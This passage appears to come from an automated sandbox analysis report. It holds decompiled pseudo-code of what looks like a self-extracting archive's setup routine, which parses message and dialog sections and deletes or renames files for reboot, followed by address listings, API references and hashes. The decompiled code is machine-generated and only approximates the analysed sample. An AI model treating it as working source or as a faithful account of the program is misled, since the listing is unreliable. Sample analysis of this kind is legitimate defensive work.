								if(_t299 < 0x100) {
									continue;
								}
								__eflags = _t381 - 0xffffffff;
								if(_t381 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t390 + _t384 - 0x4288)) != 0x2a ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x2a) {
									L14:
									_t370 = 0x2a;
									if( *((intOrPtr*)(_t390 + _t384 - 0x4288)) != _t370) {
										L18:
										if( *((char*)(_t390 + _t384 - 0x4288)) != 0x52 ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x61) {
											L21:
											_t384 = _t384 + 1;
											if(_t384 > _t390[0x15]) {
												goto L25;
											}
											_t294 = _t390[0x17];
											continue;
										} else {
											_t302 = E00215460(_t390 - 0x4286 + _t384, 0x22261c, 4);
											_t394 = _t394 + 0xc;
											if(_t302 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t366 = _t390 - 0x4284 + _t384;
									if( *((intOrPtr*)(_t390 - 0x4284 + _t384 - 2)) == _t370 && _t384 <= _t294 + 0xffffffe0) {
										_t304 = E00214DA0(_t366, L"*messages***", 0xb);
										_t394 = _t394 + 0xc;
										if(_t304 == 0) {
											_t390[0x1e] = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t307 = E00215460(_t390 - 0x4286 + _t384, "*messages***", 0xb);
									_t394 = _t394 + 0xc;
									if(_t307 == 0) {
										L24:
										_t295 = _t390[0x1b];
										_t381 = _t384 + _t390[0x1b];
										_t390[0x19] = _t381;
										goto L26;
									}
									_t294 = _t390[0x17];
									goto L14;
								}
							}
						}
						asm("cdq");
						E001F9A4C(_t390 - 0x2288, _t390, _t381, _t370, _t316);
						_push(0x200002);
						_t382 = E00212B53(_t390 - 0x2288);
						_t390[0x1a] = _t382;
						__eflags = _t382;
						if(_t382 == 0) {
							goto L57;
						}
						_t328 = E001F9979(_t370, _t382, "@."");
						_t390[0x19] = _t328;
						__eflags = _t390[0x1e];
						if(_t390[0x1e] == 0) {
							_push(2 + _t328 * 2);
							_t212 = E00212B53(_t328);
							_t390[0x1e] = _t212;
							__eflags = _t212;
							if(_t212 == 0) {
								goto L57;
							}
							_t330 = _t390[0x19];
							 *(_t330 + _t382) = _t316;
							__eflags = _t330 + 1;
							E00200FDE(_t382, _t212, _t330 + 1);
							L00212B4E(_t382);
							_t382 = _t390[0x1e];
							_t333 = _t390[0x19];
							_t390[0x1a] = _t382;
							L33:
							_t215 = 0x100000;
							__eflags = _t333 - 0x100000;
							if(_t333 <= 0x100000) {
								_t215 = _t333;
							}
							 *((short*)(_t382 + _t215 * 2)) = 0;
							E001FFA56(_t390 - 0xd4, 0x222624, 0x64);
							_push(0x20002);
							_t218 = E00212B53(0);
							_t390[0x1b] = _t218;
							__eflags = _t218;
							if(_t218 != 0) {
								__eflags = _t390[0x19];
								_t336 = _t316;
								_t371 = _t316;
								_t390[0x1e] = _t336;
								 *_t390 = _t316;
								_t383 = _t316;
								_t390[0x17] = _t316;
								if(_t390[0x19] <= 0) {
									L54:
									E001FCB33(_t387, _t371, _t390, _t218, _t336);
									L00212B4E(_t390[0x1a]);
									L00212B4E(_t390[0x1b]);
									__eflags =  *((intOrPtr*)(_t387 + 0x2c)) - _t316;
									if( *((intOrPtr*)(_t387 + 0x2c)) <= _t316) {
										L56:
										 *0x230124 =  *((intOrPtr*)(_t387 + 0x28));
										E00215030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x3c)),  *((intOrPtr*)(_t387 + 0x40)), 4, E001FCD08);
										E00215030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x50)),  *((intOrPtr*)(_t387 + 0x54)), 4, E001FCD37);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E00203393(_t387 + 0x3c, _t371, _t316);
										E00203393(_t387 + 0x50, _t371, _t316);
										_t316 = _t316 + 1;
										__eflags = _t316 -  *((intOrPtr*)(_t387 + 0x2c));
									} while (_t316 <  *((intOrPtr*)(_t387 + 0x2c)));
									goto L56;
								}
								_t390[0x14] = 0xd;
								_t390[0x13] = 0xa;
								_t390[0x15] = 9;
								do {
									_t228 = _t390[0x1a];
									__eflags = _t383;
									if(_t383 == 0) {
										L80:
										_t372 =  *(_t228 + _t383 * 2) & 0x0000ffff;
										_t383 = _t383 + 1;
										__eflags = _t372;
										if(_t372 == 0) {
											break;
										}
										__eflags = _t372 - _t390[0x11];
										if(_t372 != _t390[0x11]) {
											_t229 = 0xd;
											__eflags = _t372 - _t229;
											if(_t372 == _t229) {
												L99:
												E001FCB33(_t387, _t390[0x17], _t390, _t390[0x1b], _t336);
												 *_t390 = _t316;
												_t336 = _t316;
												_t390[0x17] = _t316;
												L98:
												_t390[0x1e] = _t336;
												goto L52;
											}
											_t232 = 0xa;
											__eflags = _t372 - _t232;
											if(_t372 == _t232) {
												goto L99;
											}
											L96:
											__eflags = _t336 - 0x10000;
											if(_t336 >= 0x10000) {
												goto L52;
											}
											 *(_t390[0x1b] + _t336 * 2) = _t372;
											_t336 = _t336 + 1;
											__eflags = _t336;
											goto L98;
										}
										__eflags = _t336 - 0x10000;
										if(_t336 >= 0x10000) {
											goto L52;
										}
										_t235 = ( *(_t228 + _t383 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t235;
										if(_t235 == 0) {
											_push(0x22);
											L93:
											_pop(_t377);
											 *(_t390[0x1b] + _t336 * 2) = _t377;
											_t336 = _t336 + 1;
											_t390[0x1e] = _t336;
											_t383 = _t383 + 1;
											goto L52;
										}
										_t237 = _t235 - 0x3a;
										__eflags = _t237;
										if(_t237 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t238 = _t237 - 0x12;
										__eflags = _t238;
										if(_t238 == 0) {
											_push(0xa);
											goto L93;
										}
										_t239 = _t238 - 4;
										__eflags = _t239;
										if(_t239 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t239 != 0;
										if(_t239 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t373 =  *(_t228 + _t383 * 2 - 2) & 0x0000ffff;
									__eflags = _t373 - _t390[0x14];
									if(_t373 == _t390[0x14]) {
										L42:
										_t343 = 0x3a;
										__eflags =  *(_t228 + _t383 * 2) - _t343;
										if( *(_t228 + _t383 * 2) != _t343) {
											L71:
											_t390[0x18] = _t228 + _t383 * 2;
											_t244 = E001FF91A( *(_t228 + _t383 * 2) & 0x0000ffff);
											__eflags = _t244;
											if(_t244 == 0) {
												L79:
												_t336 = _t390[0x1e];
												_t228 = _t390[0x1a];
												goto L80;
											}
											E001FFAB1(_t390 - 0x264, _t390[0x18], 0x64);
											_t248 = E00214E1D(_t390 - 0x264, L" \t,");
											_t390[0x18] = _t248;
											__eflags = _t248;
											if(_t248 == 0) {
												goto L79;
											}
											 *_t248 = 0;
											E002011FA(_t390 - 0x264, _t390 - 0x138, 0x64);
											E001FFA56(_t390 - 0x70, _t390 - 0xd4, 0x64);
											E001FFA2F(__eflags, _t390 - 0x70, _t390 - 0x138, 0x64);
											E001FFA56(_t390, _t390 - 0x70, 0x32);
											_t262 = E00214E71(_t316, 0, _t383, _t387, _t390 - 0x70,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E001FCCED);
											_t394 = _t394 + 0x14;
											__eflags = _t262;
											if(_t262 != 0) {
												_t268 =  *_t262 * 0xc;
												__eflags = _t268;
												_t167 = _t268 + 0x22d150; // 0x28b64ee0
												_t390[0x17] =  *_t167;
											}
											_t383 = _t383 + (_t390[0x18] - _t390 - 0x264 >> 1) + 1;
											__eflags = _t383;
											_t267 = _t390[0x1a];
											_t374 = 0x20;
											while(1) {
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												L77:
												_t174 =  &(_t390[0x15]); // 0x9
												__eflags = _t348 -  *_t174;
												if(_t348 !=  *_t174) {
													L51:
													_t336 = _t390[0x1e];
													goto L52;
												}
												L78:
												_t383 = _t383 + 1;
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												goto L77;
											}
										}
										_t389 = _t390[0x1a];
										_t270 = _t228 | 0xffffffff;
										__eflags = _t270;
										_t390[0x16] = _t270;
										_t390[0xd] = L"STRINGS";
										_t390[0xe] = L"DIALOG";
										_t390[0xf] = L"MENU";
										_t390[0x10] = L"DIRECTION";
										_t390[0x18] = _t316;
										do {
											_t93 = _t316 * 4; // 0x222628
											_t271 = E00212B33( *((intOrPtr*)(_t390 + _t93 + 0x34)));
											_t96 = _t316 * 4; // 0x222628
											_t390[0x18] = _t271;
											_t272 = E00214DA0(_t389 + 2 + _t383 * 2,  *((intOrPtr*)(_t390 + _t96 + 0x34)), _t271);
											_t394 = _t394 + 0x10;
											_t375 = 0x20;
											__eflags = _t272;
											if(_t272 != 0) {
												L47:
												_t273 = _t390[0x16];
												goto L48;
											}
											_t357 = _t390[0x18] + _t383;
											__eflags =  *((intOrPtr*)(_t389 + 2 + _t357 * 2)) - _t375;
											if( *((intOrPtr*)(_t389 + 2 + _t357 * 2)) > _t375) {
												goto L47;
											}
											_t273 = _t316;
											_t383 = _t357 + 1;
											_t390[0x16] = _t273;
											L48:
											_t316 = _t316 + 1;
											__eflags = _t316 - 4;
										} while (_t316 < 4);
										_t387 = _t390[0x12];
										_t316 = 0;
										__eflags = _t273;
										if(__eflags != 0) {
											_t228 = _t390[0x1a];
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												L60:
												__eflags = _t351 - _t390[0x15];
												if(_t351 != _t390[0x15]) {
													_t376 = _t228 + _t383 * 2;
													_t390[0x18] = _t316;
													_t274 = 0x20;
													_t352 = _t316;
													__eflags =  *_t376 - _t274;
													if( *_t376 <= _t274) {
														L66:
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = 0;
														E002011FA(_t390 - 0x19c, _t390 - 0x70, 0x64);
														_t383 = _t383 + _t390[0x18];
														_t279 = _t390[0x16];
														__eflags = _t279 - 3;
														if(_t279 != 3) {
															__eflags = _t279 - 1;
															_t280 = "$%s:";
															if(_t279 != 1) {
																_t280 = "@%s:";
															}
															E001FD9DC(_t390 - 0xd4, 0x64, _t280, _t390 - 0x70);
															_t394 = _t394 + 0x10;
														} else {
															_t284 = E00212B69(_t390 - 0x19c, _t390 - 0x19c, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t387 + 0x64)) =  ~_t284 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t352 - 0x63;
														if(_t352 >= 0x63) {
															break;
														}
														_t287 =  *_t376;
														_t376 = _t376 + 2;
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = _t287;
														_t352 = _t352 + 1;
														_t288 = 0x20;
														__eflags =  *_t376 - _t288;
														if( *_t376 > _t288) {
															continue;
														}
														break;
													}
													_t390[0x18] = _t352;
													goto L66;
												}
												L61:
												_t383 = _t383 + 1;
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												goto L60;
											}
										}
										E001FFA56(_t390 - 0xd4, 0x222624, 0x64);
										goto L51;
									}
									__eflags = _t373 - _t390[0x13];
									if(_t373 != _t390[0x13]) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t383 - _t390[0x19];
								} while (_t383 < _t390[0x19]);
								_t218 = _t390[0x1b];
								_t371 = _t390[0x17];
								goto L54;
							} else {
								L00212B4E(_t382);
								goto L57;
							}
						}
						_t333 = _t328 >> 1;
						_t390[0x19] = _t333;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E00203393(_t387, _t370, _t380);
						E00203393(_t387 + 0x14, _t370, _t380);
						_t380 = _t380 + 1;
						_t399 = _t380 -  *0x22d5f4; // 0x63
					} while (_t399 < 0);
					_t316 = 0;
					goto L7;
				}
			}









































































          0x001fcfd0
          0x001fcfd0
          0x001fcfd1
          0x001fcfd9
          0x001fcfe3
          0x001fcfed
          0x001fcfee
          0x001fcfef
          0x001fcff2
          0x001fcff4
          0x001fcff7
          0x001fcffa
          0x001fd000
          0x001fd002
          0x001fd005
          0x001fd00b
          0x001fd047
          0x001fd00d
          0x001fd015
          0x001fd02d
          0x001fd037
          0x001fd037
          0x001fd052
          0x001fd057
          0x001fd05f
          0x001fd062
          0x001fd070
          0x001fd42d
          0x001fd433
          0x001fd43e
          0x001fd449
          0x001fd076
          0x001fd076
          0x001fd078
          0x001fd07e
          0x001fd09c
          0x001fd0a8
          0x001fd0ba
          0x001fd0bf
          0x001fd0c2
          0x001fd0c5
          0x001fd0c8
          0x001fd0cb
          0x001fd0ce
          0x001fd0e2
          0x001fd0f7
          0x001fd0fc
          0x001fd0ff
          0x001fd101
          0x001fd101
          0x001fd104
          0x001fd109
          0x001fd1c8
          0x001fd1c8
          0x001fd1cb
          0x001fd1ce
          0x001fd1df
          0x001fd1e7
          0x001fd1e8
          0x001fd1eb
          0x001fd1f0
          0x00000000
          0x00000000
          0x001fd1f6
          0x001fd1f9
          0x00000000
          0x00000000
          0x00000000
          0x001fd1f9
          0x00000000
          0x001fd10f
          0x001fd117
          0x001fd142
          0x001fd144
          0x001fd14d
          0x001fd178
          0x001fd180
          0x001fd1ac
          0x001fd1ac
          0x001fd1b0
          0x00000000
          0x00000000
          0x001fd1b2
          0x00000000
          0x001fd18c
          0x001fd19c
          0x001fd1a1
          0x001fd1a6
          0x00000000
          0x00000000
          0x00000000
          0x001fd1a6
          0x001fd180
          0x001fd155
          0x001fd15b
          0x001fd16c
          0x001fd171
          0x001fd176
          0x001fd1ba
          0x00000000
          0x001fd1ba
          0x001fd176
          0x00000000
          0x001fd123
          0x001fd133
          0x001fd138
          0x001fd13d
          0x001fd1be
          0x001fd1be
          0x001fd1c1
          0x001fd1c3
          0x00000000
          0x001fd1c3
          0x001fd13f
          0x00000000
          0x001fd13f
          0x001fd117
          0x001fd10f
          0x001fd208
          0x001fd20b
          0x001fd210
          0x001fd21a
          0x001fd21c
          0x001fd220
          0x001fd222
          0x00000000
          0x00000000
          0x001fd239
          0x001fd23e
          0x001fd241
          0x001fd243
          0x001fd253
          0x001fd254
          0x001fd259
          0x001fd25d
          0x001fd25f
          0x00000000
          0x00000000
          0x001fd265
          0x001fd268
          0x001fd26b
          0x001fd26f
          0x001fd275
          0x001fd27a
          0x001fd27e
          0x001fd281
          0x001fd284
          0x001fd284
          0x001fd289
          0x001fd28b
          0x001fd28d
          0x001fd28d
          0x001fd293
          0x001fd2a3
          0x001fd2a8
          0x001fd2ad
          0x001fd2b2
          0x001fd2b6
          0x001fd2b8
          0x001fd2c6
          0x001fd2ca
          0x001fd2cc
          0x001fd2ce
          0x001fd2d1
          0x001fd2d4
          0x001fd2d6
          0x001fd2d9
          0x001fd3c1
          0x001fd3ca
          0x001fd3d2
          0x001fd3da
          0x001fd3e1
          0x001fd3e4
          0x001fd3fe
          0x001fd40b
          0x001fd413
          0x001fd425
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x001fd3e6
          0x001fd3e6
          0x001fd3ea
          0x001fd3f3
          0x001fd3f8
          0x001fd3f9
          0x001fd3f9
          0x00000000
          0x001fd3e6
          0x001fd2df
          0x001fd2e6
          0x001fd2ed
          0x001fd2f4
          0x001fd2f4
          0x001fd2f7
          0x001fd2f9
          0x001fd5f5
          0x001fd5f5
          0x001fd5f9
          0x001fd5fa
          0x001fd5fd
          0x00000000
          0x00000000
          0x001fd603
          0x001fd607
          0x001fd659
          0x001fd65a
          0x001fd65d
          0x001fd683
          0x001fd690
          0x001fd695
          0x001fd698
          0x001fd69a
          0x001fd67b
          0x001fd67b
          0x00000000
          0x001fd67b
          0x001fd661
          0x001fd662
          0x001fd665
          0x00000000
          0x00000000
          0x001fd667
          0x001fd667
          0x001fd66d
          0x00000000
          0x00000000
          0x001fd676
          0x001fd67a
          0x001fd67a
          0x00000000
          0x001fd67a
          0x001fd609
          0x001fd60f
          0x00000000
          0x00000000
          0x001fd619
          0x001fd619
          0x001fd61c
          0x001fd643
          0x001fd645
          0x001fd648
          0x001fd649
          0x001fd64d
          0x001fd64e
          0x001fd651
          0x00000000
          0x001fd651
          0x001fd61e
          0x001fd61e
          0x001fd621
          0x001fd63f
          0x00000000
          0x001fd63f
          0x001fd623
          0x001fd623
          0x001fd626
          0x001fd63b
          0x00000000
          0x001fd63b
          0x001fd628
          0x001fd628
          0x001fd62b
          0x001fd637
          0x00000000
          0x001fd637
          0x001fd62e
          0x001fd631
          0x00000000
          0x00000000
          0x001fd633
          0x00000000
          0x001fd633
          0x001fd2ff
          0x001fd304
          0x001fd308
          0x001fd314
          0x001fd316
          0x001fd317
          0x001fd31b
          0x001fd508
          0x001fd50b
          0x001fd512
          0x001fd517
          0x001fd519
          0x001fd5ef
          0x001fd5ef
          0x001fd5f2
          0x00000000
          0x001fd5f2
          0x001fd52b
          0x001fd53c
          0x001fd541
          0x001fd546
          0x001fd548
          0x00000000
          0x00000000
          0x001fd550
          0x001fd563
          0x001fd575
          0x001fd587
          0x001fd596
          0x001fd5ab
          0x001fd5b0
          0x001fd5b3
          0x001fd5b5
          0x001fd5b7
          0x001fd5b7
          0x001fd5ba
          0x001fd5c0
          0x001fd5c0
          0x001fd5d3
          0x001fd5d3
          0x001fd5d5
          0x001fd5d8
          0x001fd5d9
          0x001fd5d9
          0x001fd5dd
          0x001fd5e0
          0x00000000
          0x00000000
          0x001fd5e2
          0x001fd5e2
          0x001fd5e2
          0x001fd5e6
          0x001fd3af
          0x001fd3af
          0x00000000
          0x001fd3af
          0x001fd5ec
          0x001fd5ec
          0x001fd5d9
          0x001fd5dd
          0x001fd5e0
          0x00000000
          0x00000000
          0x00000000
          0x001fd5e0
          0x001fd5d9
          0x001fd321
          0x001fd324
          0x001fd324
          0x001fd327
          0x001fd32a
          0x001fd331
          0x001fd338
          0x001fd33f
          0x001fd346
          0x001fd349
          0x001fd349
          0x001fd34d
          0x001fd353
          0x001fd35a
          0x001fd361
          0x001fd366
          0x001fd36b
          0x001fd36c
          0x001fd36e
          0x001fd386
          0x001fd386
          0x00000000
          0x001fd386
          0x001fd373
          0x001fd375
          0x001fd37a
          0x00000000
          0x00000000
          0x001fd37c
          0x001fd37e
          0x001fd381
          0x001fd389
          0x001fd389
          0x001fd38a
          0x001fd38a
          0x001fd38f
          0x001fd392
          0x001fd394
          0x001fd396
          0x001fd44c
          0x001fd44f
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x001fd455
          0x001fd455
          0x001fd455
          0x001fd459
          0x001fd45c
          0x00000000
          0x00000000
          0x001fd45e
          0x001fd45e
          0x001fd462
          0x001fd467
          0x001fd46a
          0x001fd46f
          0x001fd470
          0x001fd472
          0x001fd475
          0x001fd496
          0x001fd498
          0x001fd4ad
          0x001fd4b2
          0x001fd4b5
          0x001fd4b8
          0x001fd4bb
          0x001fd4de
          0x001fd4e1
          0x001fd4e6
          0x001fd4e8
          0x001fd4e8
          0x001fd4fb
          0x001fd500
          0x001fd4bd
          0x001fd4c9
          0x001fd4d1
          0x001fd4d6
          0x001fd4d6
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x001fd477
          0x001fd477
          0x001fd477
          0x001fd47a
          0x00000000
          0x00000000
          0x001fd47c
          0x001fd47f
          0x001fd482
          0x001fd48a
          0x001fd48d
          0x001fd48e
          0x001fd491
          0x00000000
          0x00000000
          0x00000000
          0x001fd491
          0x001fd493
          0x00000000
          0x001fd493
          0x001fd464
          0x001fd464
          0x001fd455
          0x001fd455
          0x001fd459
          0x001fd45c
          0x00000000
          0x00000000
          0x00000000
          0x001fd45c
          0x001fd455
          0x001fd3aa
          0x00000000
          0x001fd3aa
          0x001fd30a
          0x001fd30e
          0x00000000
          0x00000000
          0x00000000
          0x001fd3b2
          0x001fd3b2
          0x001fd3b2
          0x001fd3bb
          0x001fd3be
          0x00000000
          0x001fd2ba
          0x001fd2bb
          0x00000000
          0x001fd2c0
          0x001fd2b8
          0x001fd245
          0x001fd247
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x001fd080
          0x001fd080
          0x001fd083
          0x001fd08c
          0x001fd091
          0x001fd092
          0x001fd092
          0x001fd09a
          0x00000000
          0x001fd09a

          APIs
          • __EH_prolog.LIBCMT ref: 001FCFD9
          • _wcschr.LIBVCRUNTIME ref: 001FCFFA
          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001FD015
          • __fprintf_l.LIBCMT ref: 001FD4FB
            • Part of subcall function 00200FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,001FB312,00000000,?,?,?,000F004A), ref: 00200FFA
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
          • String ID: $ ,$$%s:$(&"$*messages***$*messages***$8&"$@%s:$@."$H&"$R$RTL$T&"$a
          • API String ID: 4184910265-3247519970
          • Opcode ID: 006115a27f1720f57b35d758d194082fba1fe72da7da74a0769336fe60dde4e2
          • Instruction ID: d4ea251b75978c6823f8c9af539dcb23f4a2e1f6b0becaaec9b3c6c1af89c4d4
          • Opcode Fuzzy Hash: 006115a27f1720f57b35d758d194082fba1fe72da7da74a0769336fe60dde4e2
          • Instruction Fuzzy Hash: 5212DEB160030DABDB24EFA4EC85AFD37AAFF54304F50016AFA0997291EB71D995CB50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020B4C7, Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438windowfileCOMMON
          Download Yara Rule
          C-Code - Quality: 49%
          			E0020B4C7(void* __edx) {
				intOrPtr _t215;
				void* _t220;
				intOrPtr _t278;
				void* _t291;
				WCHAR* _t293;
				void* _t296;
				WCHAR* _t297;
				void* _t302;

				_t291 = __edx;
				E0020D870(E0022150B, _t302);
				_t215 = 0x1bc80;
				E0020D940();
				if( *((intOrPtr*)(_t302 + 0xc)) == 0) {
					L169:
					 *[fs:0x0] =  *((intOrPtr*)(_t302 - 0xc));
					return _t215;
				}
				_push(0x1000);
				_push(_t302 - 0xe);
				_push(_t302 - 0xd);
				_push(_t302 - 0x5c84);
				_push(_t302 - 0xfc8c);
				_push( *((intOrPtr*)(_t302 + 0xc)));
				_t215 = E0020A156();
				 *((intOrPtr*)(_t302 + 0xc)) = 0x1bc80;
				if(0x1bc80 != 0) {
					_t278 =  *((intOrPtr*)(_t302 + 0x10));
					do {
						_t220 = _t302 - 0x5c84;
						_t296 = _t302 - 0x1bc8c;
						_t293 = 6;
						goto L4;
						L6:
						while(E00201410(_t302 - 0xfc8c,  *((intOrPtr*)(0x22d618 + _t297 * 4))) != 0) {
							_t297 =  &(_t297[0]);
							if(_t297 < 0xe) {
								continue;
							} else {
								goto L167;
							}
						}
						if(_t297 > 0xd) {
							goto L167;
						}
						switch( *((intOrPtr*)(_t297 * 4 +  &M0020C0D7))) {
							case 0:
								__eflags = _t278 - 2;
								if(_t278 != 2) {
									goto L167;
								}
								_t299 = 0x800;
								E002095F8(_t302 - 0x7c84, 0x800);
								E001FA188(E001FB625(_t302 - 0x7c84, _t302 - 0x5c84, _t302 - 0xdc8c, 0x800), _t278, _t302 - 0x8c8c, 0x800);
								 *(_t302 - 4) = _t293;
								E001FA2C2(_t302 - 0x8c8c, _t302 - 0xdc8c);
								E001F6EF9(_t302 - 0x3c84);
								_push(_t293);
								_t286 = _t302 - 0x8c8c;
								_t238 = E001FA215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
								__eflags = _t238;
								if(_t238 == 0) {
									L28:
									 *(_t302 - 4) =  *(_t302 - 4) | 0xffffffff;
									E001FA19E(_t302 - 0x8c8c);
									goto L167;
								} else {
									goto L15;
									L16:
									E001FB1B7(_t286, __eflags, _t302 - 0x7c84, _t302 - 0x103c, _t299);
									E001FAEA5(__eflags, _t302 - 0x103c, _t299);
									_t301 = E00212B33(_t302 - 0x7c84);
									__eflags = _t301 - 4;
									if(_t301 < 4) {
										L18:
										_t266 = E001FB5E5(_t302 - 0x5c84);
										__eflags = _t266;
										if(_t266 != 0) {
											goto L28;
										}
										L19:
										_t268 = E00212B33(_t302 - 0x3c84);
										__eflags = 0;
										 *((short*)(_t302 + _t268 * 2 - 0x3c82)) = 0;
										E0020E920(_t293, _t302 - 0x3c, _t293, 0x1e);
										_t304 = _t304 + 0x10;
										 *((intOrPtr*)(_t302 - 0x38)) = 3;
										_push(0x14);
										_pop(_t271);
										 *((short*)(_t302 - 0x2c)) = _t271;
										 *((intOrPtr*)(_t302 - 0x34)) = _t302 - 0x3c84;
										_push(_t302 - 0x3c);
										 *0x22def4();
										goto L20;
									}
									_t276 = E00212B33(_t302 - 0x103c);
									__eflags = _t301 - _t276;
									if(_t301 > _t276) {
										goto L19;
									}
									goto L18;
									L20:
									_t243 = GetFileAttributesW(_t302 - 0x3c84);
									__eflags = _t243 - 0xffffffff;
									if(_t243 == 0xffffffff) {
										L27:
										_push(_t293);
										_t286 = _t302 - 0x8c8c;
										_t245 = E001FA215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
										__eflags = _t245;
										if(_t245 != 0) {
											_t299 = 0x800;
											L15:
											SetFileAttributesW(_t302 - 0x3c84, _t293);
											__eflags =  *((char*)(_t302 - 0x2c78));
											if(__eflags == 0) {
												goto L20;
											}
											goto L16;
										}
										goto L28;
									}
									_t247 = DeleteFileW(_t302 - 0x3c84);
									__eflags = _t247;
									if(_t247 != 0) {
										goto L27;
									} else {
										_t300 = _t293;
										_push(_t293);
										goto L24;
										L24:
										E001F3E41(_t302 - 0x103c, 0x800, L"%s.%d.tmp", _t302 - 0x3c84);
										_t304 = _t304 + 0x14;
										_t252 = GetFileAttributesW(_t302 - 0x103c);
										__eflags = _t252 - 0xffffffff;
										if(_t252 != 0xffffffff) {
											_t300 = _t300 + 1;
											__eflags = _t300;
											_push(_t300);
											goto L24;
										} else {
											_t255 = MoveFileW(_t302 - 0x3c84, _t302 - 0x103c);
											__eflags = _t255;
											if(_t255 != 0) {
												MoveFileExW(_t302 - 0x103c, _t293, 4);
											}
											goto L27;
										}
									}
								}
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax = E00212B33(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0x24ce0c);
									__eax = E00212B5E(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										 *0x24ce0c = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										__eax = E002166ED(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L00212B4E(__esi);
									}
								}
								goto L167;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
								}
								goto L167;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L167;
								}
								__eflags =  *0x239602 - __di;
								if( *0x239602 != __di) {
									goto L167;
								}
								__eax = 0;
								__edi = __ebp - 0x5c84;
								_push(0x22);
								 *(__ebp - 0x103c) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x5c84) - __ax;
								if( *(__ebp - 0x5c84) == __ax) {
									__edi = __ebp - 0x5c82;
								}
								__eax = E00212B33(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L167;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										L54:
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L66:
											__ebp - 0x103c = E001FFAB1(__ebp - 0x103c, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L67:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x103c;
											__eax = E00210D9B(__ebp - 0x103c, __ebp - 0x103c);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
												if( *((intOrPtr*)(__eax + 2)) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x103c;
											__edi = 0x239602;
											E001FFAB1(0x239602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
											__eax = E00209FFC(__ebp - 0x103c, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
											__ebx =  *0x22df7c;
											__eax = SendMessageW(__esi, 0x143, __ebx, 0x239602); // executed
											__eax = __ebp - 0x103c;
